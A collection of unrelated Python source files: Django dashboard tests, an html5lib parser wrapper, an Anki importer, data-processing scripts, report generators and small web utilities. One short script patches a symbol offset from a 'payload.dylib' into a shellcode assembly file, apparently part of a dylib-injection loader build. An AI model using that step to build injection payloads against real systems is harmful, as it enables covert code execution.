self.response = form.submit()
# Test the update of the attribute option group and attribute option
self._test_update_of_objects()
# Test the response
self._test_regular_window_success_response()
class TestAttributeOptionGroupListView(WebTestCase):
is_staff = True
def test_display_pagination_navigation(self):
url_name = 'dashboard:catalogue-attribute-option-group-list'
per_page = settings.IZI_DASHBOARD_ITEMS_PER_PAGE
attribute_option_group_name = 'Test Attribute Option Group #%d'
for i in range(0, int(1.5 * per_page)):
AttributeOptionGroupFactory(name=attribute_option_group_name % i)
page = self.get(reverse(url_name))
# Test the pagination
self.assertContains(page, 'Page 1 of 2')
class TestAttributeOptionGroupDeleteView(AttributeOptionGroupDeleteMixin,
AttributeOptionGroupPopUpWindowMixin,
AttributeOptionGroupRegularWindowMixin,
WebTestCase):
is_staff = True
def setUp(self):
super().setUp()
self.attribute_option_group = AttributeOptionGroupFactory()
AttributeOptionFactory(group=self.attribute_option_group)
def test_display_delete_form_via_popup_window(self):
self._set_up_display_delete_form_vars()
self._set_up_display_delete_form_allowed_vars()
self._set_up_pop_up_window_vars()
params = {
self.is_popup_var: self.is_popup,
}
querystring = urlencode(params)
url = '%s?%s' % (self.url, querystring)
self.response = self.get(url)
# Test the response
self._test_display_delete_form_response()
self._test_display_delete_pop_up_window_response()
def test_display_delete_disallowed_via_popup_window(self):
self._set_up_display_delete_form_vars()
self._set_up_display_delete_form_disallowed_vars()
self._set_up_pop_up_window_vars()
ProductAttributeFactory(
type='multi_option', name='Sizes', code='sizes', option_group=self.attribute_option_group)
params = {
self.is_popup_var: self.is_popup,
}
querystring = urlencode(params)
url = '%s?%s' % (self.url, querystring)
self.response = self.get(url)
# Test the response
self._test_display_delete_form_response()
self._test_display_delete_disallowed_response()
self._test_display_delete_pop_up_window_response()
def test_display_delete_form_via_regular_window(self):
self._set_up_display_delete_form_vars()
self._set_up_display_delete_form_allowed_vars()
self.response = self.get(self.url)
# Test the response
self._test_display_delete_form_response()
self._test_display_regular_window_response()
def test_display_disallowed_delete_via_regular_window(self):
self._set_up_display_delete_form_vars()
self._set_up_display_delete_form_disallowed_vars()
ProductAttributeFactory(
type='multi_option', name='Sizes', code='sizes', option_group=self.attribute_option_group)
self.response = self.get(self.url)
# Test the response
self._test_display_delete_form_response()
self._test_display_delete_disallowed_response()
self._test_display_regular_window_response()
def test_delete_via_popup_window(self):
self._set_up_delete_vars()
self._set_up_pop_up_window_vars()
form = self.get(self.url).form
params = dict(form.submit_fields())
params[self.is_popup_var] = self.is_popup
self.response = self.post(self.url, params=params)
# Test the deletion of the attribute option group and attribute option
self._test_deletion_of_objects()
# Test the response
self._test_delete_pop_up_window_success_response()
def test_delete_via_regular_window(self):
self._set_up_delete_vars()
self._set_up_delete_success_vars()
form = self.get(self.url).form
self.response = form.submit()
# Test the deletion of the attribute option group and attribute option
self._test_deletion_of_objects()
# Test the response
self._test_regular_window_success_response()
|
"""
An interface to html5lib that mimics the lxml.html interface.
"""
import sys
import string
from html5lib import HTMLParser as _HTMLParser
from html5lib.treebuilders.etree_lxml import TreeBuilder
from lxml import etree
from lxml.html import Element, XHTML_NAMESPACE, _contains_block_level_tag
# python3 compatibility
try:
_strings = basestring
except NameError:
_strings = (bytes, str)
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
class HTMLParser(_HTMLParser):
"""An html5lib HTML parser with lxml as tree."""
def __init__(self, strict=False, **kwargs):
_HTMLParser.__init__(self, strict=strict, tree=TreeBuilder, **kwargs)
try:
from html5lib import XHTMLParser as _XHTMLParser
except ImportError:
pass
else:
class XHTMLParser(_XHTMLParser):
"""An html5lib XHTML Parser with lxml as tree."""
def __init__(self, strict=False, **kwargs):
_XHTMLParser.__init__(self, strict=strict, tree=TreeBuilder, **kwargs)
xhtml_parser = XHTMLParser()
def _find_tag(tree, tag):
elem = tree.find(tag)
if elem is not None:
return elem
return tree.find("{%s}%s" % (XHTML_NAMESPACE, tag))
def document_fromstring(html, guess_charset=None, parser=None):
"""
Parse a whole document into a string.
If `guess_charset` is true, or if the input is not Unicode but a
byte string, the `chardet` library will perform charset guessing
on the string.
"""
if not isinstance(html, _strings):
raise TypeError("string required")
if parser is None:
parser = html_parser
options = {}
if guess_charset is None and isinstance(html, bytes):
# html5lib does not accept useChardet as an argument, if it
# detected the html argument would produce unicode objects.
guess_charset = True
if guess_charset is not None:
options["useChardet"] = guess_charset
return parser.parse(html, **options).getroot()
def fragments_fromstring(html, no_leading_text=False, guess_charset=None, parser=None):
"""Parses several HTML elements, returning a list of elements.
The first item in the list may be a string. If no_leading_text is true,
then it will be an error if there is leading text, and it will always be
a list of only elements.
If `guess_charset` is true, the `chardet` library will perform charset
guessing on the string.
"""
if not isinstance(html, _strings):
raise TypeError("string required")
if parser is None:
parser = html_parser
options = {}
if guess_charset is None and isinstance(html, bytes):
# html5lib does not accept useChardet as an argument, if it
# detected the html argument would produce unicode objects.
guess_charset = False
if guess_charset is not None:
options["useChardet"] = guess_charset
children = parser.parseFragment(html, "div", **options)
if children and isinstance(children[0], _strings):
if no_leading_text:
if children[0].strip():
raise etree.ParserError("There is leading text: %r" % children[0])
del children[0]
return children
def fragment_fromstring(html, create_parent=False, guess_charset=None, parser=None):
"""Parses a single HTML element; it is an error if there is more than
one element, or if anything but whitespace precedes or follows the
element.
If 'create_parent' is true (or is a tag name) then a parent node
will be created to encapsulate the HTML in a single element. In
this case, leading or trailing text is allowed.
If `guess_charset` is true, the `chardet` library will perform charset
guessing on the string.
"""
if not isinstance(html, _strings):
raise TypeError("string required")
accept_leading_text = bool(create_parent)
elements = fragments_fromstring(
html,
guess_charset=guess_charset,
parser=parser,
no_leading_text=not accept_leading_text,
)
if create_parent:
if not isinstance(create_parent, _strings):
create_parent = "div"
new_root = Element(create_parent)
if elements:
if isinstance(elements[0], _strings):
new_root.text = elements[0]
del elements[0]
new_root.extend(elements)
return new_root
if not elements:
raise etree.ParserError("No elements found")
if len(elements) > 1:
raise etree.ParserError("Multiple elements found")
result = elements[0]
if result.tail and result.tail.strip():
raise etree.ParserError("Element followed by text: %r" % result.tail)
result.tail = None
return result
def fromstring(html, guess_charset=None, parser=None):
"""Parse the html, returning a single element/document.
This tries to minimally parse the chunk of text, without knowing if it
is a fragment or a document.
'base_url' will set the document's base_url attribute (and the tree's
docinfo.URL)
If `guess_charset` is true, or if the input is not Unicode but a
byte string, the `chardet` library will perform charset guessing
on the string.
"""
if not isinstance(html, _strings):
raise TypeError("string required")
doc = document_fromstring(html, parser=parser, guess_charset=guess_charset)
# document starts with doctype or <html>, full document!
start = html[:50]
if isinstance(start, bytes):
# Allow text comparison in python3.
# Decode as ascii, that also covers latin-1 and utf-8 for the
# characters we need.
start = start.decode("ascii", "replace")
start = start.lstrip().lower()
if start.startswith("<html") or start.startswith("<!doctype"):
return doc
head = _find_tag(doc, "head")
# if the head is not empty we have a full document
if len(head):
return doc
body = _find_tag(doc, "body")
# The body has just one element, so it was probably a single
# element passed in
if (
len(body) == 1
and (not body.text or not body.text.strip())
and (not body[-1].tail or not body[-1].tail.strip())
):
return body[0]
# Now we have a body which represents a bunch of tags which have the
# content that was passed in. We will create a fake container, which
# is the body tag, except <body> implies too much structure.
if _contains_block_level_tag(body):
body.tag = "div"
else:
body.tag = "span"
return body
def parse(filename_url_or_file, guess_charset=None, parser=None):
"""Parse a filename, URL, or file-like object into an HTML document
tree. Note: this returns a tree, not an element. Use
``parse(...).getroot()`` to get the document root.
If ``guess_charset`` is true, the ``useChardet`` option is passed into
html5lib to enable character detection. This option is on by default
when parsing from URLs, off by default when parsing from file(-like)
objects (which tend to return Unicode more often than not), and on by
default when parsing from a file path (which is read in binary mode).
"""
if parser is None:
parser = html_parser
if not isinstance(filename_url_or_file, _strings):
fp = filename_url_or_file
if guess_charset is None:
# assume that file-like objects return Unicode more often than bytes
guess_charset = False
elif _looks_like_url(filename_url_or_file):
fp = urlopen(filename_url_or_file)
if guess_charset is None:
# assume that URLs return bytes
guess_charset = True
else:
fp = open(filename_url_or_file, "rb")
if guess_charset is None:
guess_charset = True
options = {}
# html5lib does not accept useChardet as an argument, if it
# detected the html argument would produce unicode objects.
if guess_charset:
options["useChardet"] = guess_charset
return parser.parse(fp, **options)
def _looks_like_url(str):
scheme = urlparse(str)[0]
if not scheme:
return False
elif (
sys.platform == "win32" and scheme in string.ascii_letters and len(scheme) == 1
):
# looks like a 'normal' absolute path
return False
else:
return True
html_parser = HTMLParser()
|
"""
Accuracy tester of Shaman
Usage:
shaman-tester <test_set.csv> [--model-path <model_path>]
python -m shamanld.tester <test_set.csv> [--model-path <model_path>]
:author: Prev(prevdev@gmail.com)
:license: MIT
"""
import sys
import os
import csv
import argparse
from . import shaman
def main():
aparser = argparse.ArgumentParser()
aparser.add_argument(
'path', type=str, help='Path of the CSV file to test accuracy of Shaman ("language, code" foramt)')
aparser.add_argument('--model-path', type=str,
help='Model file path to use', default=None)
args = aparser.parse_args()
if not os.path.exists(args.path):
print('File not exists: ' + args.path)
sys.exit(-1)
if args.model_path:
print('Use model on %s' % args.model_path)
detector = shaman.Shaman(args.model_path)
else:
detector = shaman.Shaman.default()
test_with_bunch(args.path, detector)
def test_with_bunch(filepath, detector):
""" Test shaman with code bunch and show statistics
"""
print('Load CSV file')
csv.field_size_limit(sys.maxsize) # Set CSV limit to sys.maxsize
filedata = []
with open(filepath) as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for row in reader:
filedata.append(row)
correct = 0
totals = len(filedata)
results = {}
print('Start testing')
for index, (language, code) in enumerate(filedata):
print('Testing %s/%s ' % (index, len(filedata)), end="\r")
if language not in detector.model['languages']:
totals -= 1
continue
if language not in results:
results[language] = [0, 0, 0]
try:
inferenced = detector.detect(code)[0][0]
except IndexError:
inferenced = None
if inferenced == language:
correct += 1
results[language][0] += 1
results[language][1] += 1
results[language][2] = results[language][0] / results[language][1]
print('| Language | Accuracy |')
print('|--------------|---------------------------|')
print_table_row(
'Total',
'%.2lf%% (%d / %d)' % (correct / totals * 100, correct, totals),
12,
25,
)
results = sorted(results.items(), key=lambda x: x[1][0], reverse=True)
for lang, l in results:
print_table_row(
lang,
'%.2lf%% (%d / %d)' % (l[2] * 100, l[0], l[1]),
12,
25,
)
def print_table_row(col1, col2, col1_len, col2_len):
col1 += ' ' * (col1_len - len(col1))
col2 += ' ' * (col2_len - len(col2))
print('| %s | %s |' % (col1, col2))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
import os
import shutil
from . import settings
from aqt import mw
from anki.cards import Card
from anki.notes import Note
from anki.collection import Collection
from aqt.utils import showInfo
def importer(my_files_catalog):
for file in my_files_catalog:
importer_to_anki(file)
empty_trash()
delete_empty_decks()
def importer_to_anki(file):
archive_folder_input = settings.get_settings_by_name("archive folder")
if archive_folder_input == "":
pass
elif archive_folder_input.find("\n") != -1:
archive_folders = archive_folder_input.split("\n")
else:
archive_folders = [archive_folder_input]
is_in_archive_folder = False
for archive_folder in archive_folders:
archive_folder = archive_folder.lstrip(" ")
archive_folder = archive_folder.rstrip(" ")
archive_folder = "/" + archive_folder
if file.get_file_relative_path().startswith(archive_folder) and archive_folder != "" and archive_folder != "\n":
is_in_archive_folder = True
if file.get_file_relative_path().startswith("/.trash"):
uid = file.get_file_uid()
note_list = mw.col.find_notes(uid)
if len(note_list) > 0:
for single_note_id in note_list:
single_note = mw.col.getNote(single_note_id)
try:
if single_note["UID"] == uid:
mw.col.remNotes([single_note_id])
except KeyError:
pass
elif is_in_archive_folder: # or file.get_file_root_folder() == settings.get_settings_by_name("ignore folder")
uid = file.get_file_uid()
note_list = mw.col.find_notes(uid)
if len(note_list) > 0:
for single_note_id in note_list:
single_note = mw.col.getNote(single_note_id)
if single_note["UID"] == uid:
mw.col.remNotes([single_note_id])
else:
deck_id = mw.col.decks.id(file.get_deck_name())
mw.col.decks.select(deck_id)
card_model = mw.col.models.byName("Obsidianki4")
uid = file.get_file_uid()
note_list = mw.col.find_notes(uid)
found_exisiting_file = False
if len(note_list) > 0:
for single_note_id in note_list:
single_note = mw.col.getNote(single_note_id)
if single_note.model() == card_model:
if single_note["UID"] == uid:
if file.get_cloze_or_basic():
single_note["Cloze"] = file.get_file_content()
single_note["Text"] = ""
else:
single_note["Cloze"] = "{{c1::}}"
single_note["Text"] = file.get_file_content()
back_extra = "Source: " + file.get_file_name_with_url()
single_note["Back Extra"] = back_extra
single_note.tags = []
for tag in file.get_tags():
single_note.tags.append(tag)
try:
card_ids = mw.col.card_ids_of_note(single_note_id)
mw.col.set_deck(card_ids, deck_id)
except AttributeError:
card_ids = mw.col.find_cards(uid)
mw.col.decks.setDeck(card_ids, deck_id)
single_note.flush()
found_exisiting_file = True
if not found_exisiting_file:
try:
deck = mw.col.decks.get(deck_id)
deck["mid"] = card_model["id"]
mw.col.decks.save(deck)
note_object = mw.col.newNote(deck_id)
if file.get_cloze_or_basic():
note_object["Cloze"] = file.get_file_content()
note_object["Text"] = ""
else:
note_object["Cloze"] = "{{c1::}}"
note_object["Text"] = file.get_file_content()
note_object["UID"] = uid
back_extra = "Source: " + file.get_file_name_with_url()
note_object["Back Extra"] = back_extra
for tag in file.get_tags():
note_object.tags.append(tag)
mw.col.add_note(note_object, deck_id)
except TypeError:
pass
def delete_empty_decks():
names_and_ids = mw.col.decks.all_names_and_ids()
for name_and_id in names_and_ids:
# I could not find what type this object is, so the only way for me to do it now is to use the string.
name_and_id_segments = str(name_and_id).split("\n")
deck_id= int(name_and_id_segments[0].split(": ")[1])
if deck_has_cards(deck_id):
mw.col.decks.rem(deck_id, True, True)
def empty_trash():
path_s = settings.get_settings_by_name("vault path")
if path_s == "":
pass
elif path_s.find("\n"):
paths = path_s.split("\n")
else:
paths = [paths]
for path in paths:
path = path.lstrip(" ")
path = path.rstrip(" ")
# TODO: Add this to settings
if path != "":
trash_can_path = path + "/" + ".trash"
try:
trash_directories = os.listdir(trash_can_path)
for trash_directory in trash_directories:
trash_directory_path = trash_can_path + "/" + trash_directory
try:
shutil.rmtree(trash_directory_path)
except NotADirectoryError:
os.remove(trash_directory_path)
except NotADirectoryError:
pass
def deck_has_cards(deck_id):
if deck_id != 1:
try:
if mw.col.decks.card_count(deck_id, True) == 0:
return True
except AttributeError:
cids = mw.col.decks.cids(deck_id, True)
if len(cids) == 0:
return True
return False |
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 10:34:28 2020
@author: bdobson
"""
import os
import geopandas as gpd
import pandas as pd
from shapely.geometry import Point
#Addresses
data_root = os.path.join("C:\\","Users","bdobson","Documents","data","population_data")
shape_fn = os.path.join("example_shape.shp")
pop_fn = os.path.join(data_root, "household_size.csv") # from https://www.nomisweb.co.uk/census/2011/qs406uk
loc_fn = os.path.join(data_root, "NSPL_NOV_2019_UK.csv") # https://geoportal.statistics.gov.uk/datasets/national-statistics-postcode-lookup-november-2019
oa_fn = os.path.join(data_root, "oa_2_postcode.csv") # https://geoportal.statistics.gov.uk/datasets/80628f9289574ba4b39a76ca7830b7e9_0/data
#Load and format
loc_df = pd.read_csv(loc_fn, sep=',')
loc_df = loc_df[['pcds','oseast1m','osnrth1m']]
oa_df = pd.read_csv(oa_fn, sep=',')
oa_df = pd.merge(oa_df,loc_df, on = 'pcds')
oa_df = oa_df[['oa11', 'oseast1m', 'osnrth1m']]
gdf = gpd.read_file(shape_fn)
#Make geoms and combine
oa_df['geometry'] = [Point(xy) for xy in zip(oa_df.oseast1m, oa_df.osnrth1m)]
oa_df = gpd.GeoDataFrame(oa_df, crs = gdf.crs)
oas_of_interest = gpd.sjoin(gdf, oa_df, op="contains")
oas_of_interest = oas_of_interest[['zone_name', 'oa11']].drop_duplicates()
#Load pop
pop_df = pd.read_csv(pop_fn, sep=',')
#Merge and sum
df = pd.merge(oas_of_interest, pop_df, left_on = 'oa11', right_on = 'geography')
gb = df.drop('date',axis=1).groupby('zone_name').sum()
#Add population
gb['total_population'] = 0
for i in range(1,9):
gb['total_population'] += gb.iloc[:,i] * i
gb.columns = ['total_households'] + [str(x) + '_person' for x in range(1,9)] + ['total_population']
gb = gb.rename(columns = {'8_person' : '8+_person'})
#Print
gb.to_csv('formatted_population_data.csv', sep=',')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
# pylint: disable=no-member
#
# @Author: oesteban
# @Date: 2016-01-05 11:33:39
# @Email: code@oscaresteban.es
# @Last modified by: oesteban
""" Encapsulates report generation functions """
def individual_html(in_iqms, in_plots=None, api_id=None):
from pathlib import Path
import datetime
from json import load
from mriqc import logging, __version__ as ver
from mriqc.utils.misc import BIDS_COMP
from mriqc.reports import REPORT_TITLES
from mriqc.reports.utils import iqms2html, read_report_snippet
from mriqc.data import IndividualTemplate
report_log = logging.getLogger('mriqc.report')
def _get_details(in_iqms, modality):
in_prov = in_iqms.pop('provenance', {})
warn_dict = in_prov.pop('warnings', None)
sett_dict = in_prov.pop('settings', None)
wf_details = []
if modality == 'bold':
bold_exclude_index = in_iqms.get('dumb_trs')
if bold_exclude_index is None:
report_log.warning('Building bold report: no exclude index was found')
elif bold_exclude_index > 0:
msg = """\
<span class="problematic">Non-steady state (strong T1 contrast) has been detected in the \
first {} volumes</span>. They were excluded before generating any QC measures and plots."""
wf_details.append(msg.format(bold_exclude_index))
hmc_fsl = sett_dict.pop('hmc_fsl')
if hmc_fsl is not None:
msg = 'Framewise Displacement was computed using '
if hmc_fsl:
msg += 'FSL <code>mcflirt</code>'
else:
msg += 'AFNI <code>3dvolreg</code>'
wf_details.append(msg)
fd_thres = sett_dict.pop('fd_thres')
if fd_thres is not None:
wf_details.append(
'Framewise Displacement threshold was defined at %f mm' % fd_thres)
elif modality in ('T1w', 'T2w'):
if warn_dict.pop('small_air_mask', False):
wf_details.append(
'<span class="problematic">Detected hat mask was too small</span>')
if warn_dict.pop('large_rot_frame', False):
wf_details.append(
'<span class="problematic">Detected a zero-filled frame, has the original '
'image been rotated?</span>')
return in_prov, wf_details, sett_dict
in_iqms = Path(in_iqms)
with in_iqms.open() as jsonfile:
iqms_dict = load(jsonfile)
# Now, the in_iqms file should be correctly named
out_file = str(Path(in_iqms.with_suffix(".html").name).resolve())
# Extract and prune metadata
metadata = iqms_dict.pop('bids_meta', None)
mod = metadata.pop('modality', None)
prov, wf_details, _ = _get_details(iqms_dict, mod)
file_id = [metadata.pop(k, None)
for k in list(BIDS_COMP.keys())]
file_id = [comp for comp in file_id if comp is not None]
if in_plots is None:
in_plots = []
else:
if any(('melodic_reportlet' in k for k in in_plots)):
REPORT_TITLES['bold'].insert(3, ('ICA components', 'ica-comps'))
if any(('plot_spikes' in k for k in in_plots)):
REPORT_TITLES['bold'].insert(3, ('Spikes', 'spikes'))
in_plots = [(REPORT_TITLES[mod][i] + (read_report_snippet(v), ))
for i, v in enumerate(in_plots)]
pred_qa = None # metadata.pop('mriqc_pred', None)
config = {
'modality': mod,
'dataset': metadata.pop('dataset', None),
'bids_name': in_iqms.with_suffix("").name,
'timestamp': datetime.datetime.now().strftime("%Y-%m-%d, %H:%M"),
'version': ver,
'imparams': iqms2html(iqms_dict, 'iqms-table'),
'svg_files': in_plots,
'workflow_details': wf_details,
'webapi_url': prov.pop('webapi_url'),
'webapi_port': prov.pop('webapi_port'),
'provenance': iqms2html(prov, 'provenance-table'),
'md5sum': prov['md5sum'],
'metadata': iqms2html(metadata, 'metadata-table'),
'pred_qa': pred_qa
}
if config['metadata'] is None:
config['workflow_details'].append(
'<span class="warning">File has no metadata</span> '
'<span>(sidecar JSON file missing or empty)</span>')
tpl = IndividualTemplate()
tpl.generate_conf(config, out_file)
report_log.info('Generated individual log (%s)', out_file)
return out_file
|
from django.conf import settings
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class BaseVerification(models.Model):
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name="%(app_label)s_%(class)s_related",
related_query_name="%(app_label)s_%(class)ss",
)
verification_type = models.CharField(
max_length=128,
)
verification_code = None
created = models.DateTimeField(
auto_created=True,
auto_now=True,
)
updated = models.DateTimeField(
auto_created=True,
auto_now=True,
)
class Meta:
abstract = True
ordering = ['created']
class Verification(BaseVerification):
verification_code = models.CharField(
max_length=32,
unique=True,
)
class Meta:
unique_together = ['user', 'verification_type']
ordering = ['-created']
class VerificationRecord(BaseVerification):
verification_code = models.CharField(
max_length=32,
)
is_verified = models.BooleanField(
default=False,
)
class Meta:
ordering = ['-created']
|
#coding:utf-8
###################################################################
# File Name: setting.py
# Author: Meng Zhao
# mail: @
# Created Time: Wed 21 Mar 2018 04:50:40 PM CST
#=============================================================
import os
import logging
import logging.handlers
import tensorflow as tf
#version
SERVER_NAME = 'ner'
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
DATA_DIR = BASE_DIR + '/data'
#MODEL_DIR = BASE_DIR + '/example/runs/' + SERVER_NAME
MODEL_DIR = BASE_DIR + '/output'
#bert server
TF_SERVING_REST_PORT = 16378
TF_SERVING_CLIENT_PORT = 16379
TF_SERVING_SIGNATRUE_NAME = 'predict_text'
#files path
#STOPWORD_FILE = DATA_DIR + '/stopword_data/stop_words'
STOPWORD_FILE = DATA_DIR + '/stopword_data/stop_symbol'
LABEL_FILE = MODEL_DIR + '/labels.tsv'
LABEL_MAP_FILE = MODEL_DIR + '/label_map'
VOCAB_FILE = MODEL_DIR + '/vocab.txt'
BERT_CONFIG_FILE = MODEL_DIR + '/albert_config.json'
CHECKPOINT_DIR = MODEL_DIR + '/checkpoints'
LOG_DIR = BASE_DIR + '/log/'
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
LOG_FORMAT = '%(asctime)s - %(levelname)s - [%(lineno)s]%(filename)s - %(message)s'
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
log_handler = logging.handlers.TimedRotatingFileHandler(filename=LOG_DIR + 'ner.log', when='D', interval=1, backupCount=10)
log_handler.setFormatter(logging.Formatter(LOG_FORMAT))
logging.getLogger('').addHandler(log_handler)
|
from cStringIO import StringIO
from PIL import Image
from icrawler.builtin import GoogleImageCrawler
from Craft import CraftClient
import time
import sys
import os
import win32clipboard
import win32com.client
import shutil
PATH_TO_CRAFT_SDK_FILE = "./"
sys.path.insert(0, PATH_TO_CRAFT_SDK_FILE)
pre_recv_data =''
recv_data = ''
pre_search_idx = 0
now_search_idx = 0
result_link = []
download_finish = False
start_download = False
counter = 0
shell = win32com.client.Dispatch("WScript.Shell")
def send_to_clipboard(clip_type, data):
win32clipboard.OpenClipboard()
win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(clip_type, data)
win32clipboard.CloseClipboard()
def recv_from_clipboard(clip_type):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
return data
def load_image(image_idx):
global shell
filepath = ""
if image_idx == "waiting":
filepath = 'images/' + image_idx + '.jpg'
else:
for filename in os.listdir("./images/google"):
#print "in download dir: " + filename
if filename.split('.')[0] == image_idx:
print "match the file!!!"
if filename.endswith(".png"):
print('its extension is png')
filepath = 'images/google/' + image_idx + '.png'
elif filename.endswith(".gif"):
print('its extension is gif')
filepath = 'images/google/' + image_idx + '.gif'
else:
print('its extension is jpg')
filepath = 'images/google/' + image_idx + '.jpg'
break
print "God damn sucking filepath :" + filepath + "\n"
image = Image.open(filepath)
output = StringIO()
image.convert("RGB").save(output, "BMP")
data = output.getvalue()[14:]
output.close()
send_to_clipboard(win32clipboard.CF_DIB, data)
time.sleep(0.03)
shell.SendKeys("^v")
def copy_word_and_download_image():
global recv_data
global shell
shell.SendKeys("^c")
time.sleep(0.05)
recv_data = recv_from_clipboard(win32clipboard.CF_DIB)
shell.SendKeys("{DELETE}")
load_image('waiting')
google_crawler = GoogleImageCrawler(
downloader_threads=8,
storage={'root_dir': 'images/google'}
)
google_crawler.crawl(
str(recv_data) ,
max_num=8,
date_min=None,
date_max=None,
min_size=(200,200),
max_size=(800,800))
def handleCraftEvent_chrome_gmail(event):
# do tap
global counter
counter = 0
global pre_search_idx
global now_search_idx
global download_finish
global start_download
global shell
#print '\n\n' + str(event) + '\n\n'
# do turn
if (event['message_type'] == 'crown_turn_event'):
#check tap first
print 'in turn state\n'
if event['delta'] < 0:
if(now_search_idx > 10) and download_finish:
now_search_idx -= 1
elif event['delta'] > 0:
if not download_finish and not start_download:
start_download = True
try:
copy_word_and_download_image()
except:
return
download_finish = True
start_download = False
now_search_idx = 10
tmp = now_search_idx / 10
shell.SendKeys("{DELETE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
if(now_search_idx < 80) and download_finish:
now_search_idx += 1
tmp = now_search_idx / 10
print 'search idx: %d\n' % tmp
if(pre_search_idx != tmp) and download_finish:
shell.SendKeys("{DELETE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
#else:
#stopMoving()
def handleCraftEvent_ppt(event):
# do tap
global counter
counter = 0
global pre_search_idx
global now_search_idx
global download_finish
global start_download
global shell
#print '\n\n' + str(event) + '\n\n'
# do turn
if (event['message_type'] == 'crown_turn_event'):
#check tap first
print 'in turn state\n'
if event['delta'] < 0:
if(now_search_idx > 10) and download_finish:
now_search_idx -= 1
elif event['delta'] > 0:
if not download_finish and not start_download:
start_download = True
try:
copy_word_and_download_image()
except:
return
download_finish = True
start_download = False
now_search_idx = 10
tmp = now_search_idx / 10
shell.SendKeys("{BACKSPACE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
if(now_search_idx < 80) and download_finish:
now_search_idx += 1
tmp = now_search_idx / 10
print 'search idx: %d\n' % tmp
if(pre_search_idx != tmp) and download_finish:
shell.SendKeys("{BACKSPACE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
#else:
#stopMoving()
def handleCraftEvent_word(event):
# do tap
global counter
counter = 0
global pre_search_idx
global now_search_idx
global download_finish
global start_download
global shell
#print '\n\n' + str(event) + '\n\n'
# do turn
if (event['message_type'] == 'crown_turn_event'):
#check tap first
print 'in turn state\n'
if event['delta'] < 0:
if(now_search_idx > 10) and download_finish:
now_search_idx -= 1
elif event['delta'] > 0:
if not download_finish and not start_download:
start_download = True
try:
copy_word_and_download_image()
except:
return
download_finish = True
start_download = False
now_search_idx = 10
tmp = now_search_idx / 10
shell.SendKeys("{BACKSPACE}")
time.sleep(0.01)
shell.SendKeys("{BACKSPACE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
if(now_search_idx < 80) and download_finish:
now_search_idx += 1
tmp = now_search_idx / 10
print 'search idx: %d\n' % tmp
if(pre_search_idx != tmp) and download_finish:
shell.SendKeys("{BACKSPACE}")
time.sleep(0.01)
shell.SendKeys("{BACKSPACE}")
load_image(str(tmp).zfill(6))
pre_search_idx = tmp
#else:
#stopMoving()
craft_ppt = CraftClient()
# for windows
craft_ppt.connect("POWERPNT.EXE", "")
craft_ppt.registerEventHandler(handleCraftEvent_ppt)
craft_word = CraftClient()
# for windows
craft_word.connect("WINWORD.EXE", "")
craft_word.registerEventHandler(handleCraftEvent_word)
craft_chrome = CraftClient()
# for windows
craft_chrome.connect("chrome.exe", "")
craft_chrome.registerEventHandler(handleCraftEvent_chrome_gmail)
while(1):
global counter
time.sleep(1)
if download_finish:
counter+=1
if counter==5 :
download_finish = False
folder = './images/google'
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
print 'delete' + file_path
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
print(e)
|
from subprocess import check_output
loader_offset = int(check_output('nm -g payload/payload.dylib | grep "T _load"',
shell=True).split()[0], 16)
inp = open('shellcode.in.s').read()
outp = inp.replace('OFFSET_LOAD', hex(loader_offset))
with open('shellcode.s', 'w') as f:
f.write(outp)
|
from cloud.permission import Permission, NeedPermission
# Define the input output format of the function.
# This information is used when creating the *SDK*.
info = {
'input_format': {
'count_system_user': 'bool'
},
'output_format': {
'item': {
'count': 'int'
}
},
'description': 'Return count of all users'
}
@NeedPermission(Permission.Run.Auth.get_user_count)
def do(data, resource):
body = {}
count_system_user = data.get('count_system_user', False)
partition = 'user'
count = resource.db_get_count(partition)
if not count_system_user:
query = [{
'condition': 'in',
'option': 'or',
'field': 'email',
'value': '@system.com'
}]
items, start_key = resource.db_query(partition, query, None, limit=10000)
count -= len(items)
while start_key:
items, start_key = resource.db_query(partition, query, start_key, limit=10000)
count -= len(items)
body['item'] = {
'count': count
}
return body
|
import csv
import json
data = []
with open("data/commits.json") as f:
for line in f:
parsed = json.loads(line)
email = parsed["payload"]["commits"][0]["author"]["email"]
current = {}
current["id"] = parsed["id"]
current["repository_name"] = parsed["repo"]["name"]
current["ref"] = parsed["payload"]["ref"]
current["author_email"] = email
current["author_domain"] = email.split("@")[1]
current["author_name"] = parsed["payload"]["commits"][0]["author"]["name"]
current["message"] = parsed["payload"]["commits"][0]["message"]
current["sha"] = parsed["payload"]["commits"][0]["sha"]
if "org" in parsed:
current["organisation_name"] = parsed["org"]["login"]
else:
current["organisation_name"] = None
current["created_at"] = parsed["created_at"]
data.append(current)
with open("data/commits.csv", "w") as f:
writer = csv.DictWriter(f, fieldnames=data[0].keys())
writer.writeheader()
writer.writerows(data)
|
import json
from django.http import JsonResponse
from django.middleware.csrf import get_token
def get_csrf(request):
response = JsonResponse({'detail': 'CSRF cookie set'})
response['X-CSRFToken'] = get_token(request)
return response
|
#!/usr/bin/env python
# Copyright (c) 2018 Samsung Electronics Co., Ltd. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
